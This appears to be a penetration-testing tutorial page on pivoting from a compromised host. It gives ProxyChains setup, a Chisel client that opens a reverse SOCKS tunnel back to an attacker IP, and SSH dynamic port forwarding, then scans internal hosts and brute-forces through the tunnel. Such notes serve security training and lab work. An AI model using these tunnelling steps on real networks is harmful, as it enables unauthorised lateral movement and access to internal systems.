Pivoting ( ProxyChains )

Pivoting lets the attacker access the services/machines the compromised machines connected to.

Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine

Tools Required:

  • ProxyChains

sudo apt install proxychains

  • SSH / CHISEL

NEED: With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,)

kali -> proxychains -> compromised_machine -> request for accessing from internal_machine -> internal_machine:80

Exploitation

  • After installing proxychains in the attackers machine

  • Configure the port that will be used by the proxychains with its protocol being SOCK Proxy

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051

  • Perform Dynamic port forwarding

Chisel

  • When SSH Password is not available, make use of chisel to perform

  • Start a chisel server on the attacker machine

# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse

  • On the compromised machine connect to the attackers reverse connection

# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a debian based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine

  • Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to

2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

  • By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080)

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080

  • Now we can execute commands with proxychains

proxychains nmap -p- internalIp

SSH

  • Perform Dynamic Port Forwarding

ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf file

  • Once the connection initializes, an attacker can use proxychains to leverage the attack surface

  • Legend

    • 1 - Added the port 9051 in the /etc/proxychains config file

    • 2 - Inspecting the port activity of 9051 in attackers machine

    • 3 - Dynamic port forwarding to the port configured in proxychains -D 9051

    • 4 - Activity on the port 9051 in attakcers machine

    • 5 - Grabbing banner of the service running on port 25 in the compromised machine

    • 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine

Bruteforces / Automated attack tools can be used with proxychains

PreviousPost Exploit ChecksNextPost Exploit Checks

Last updated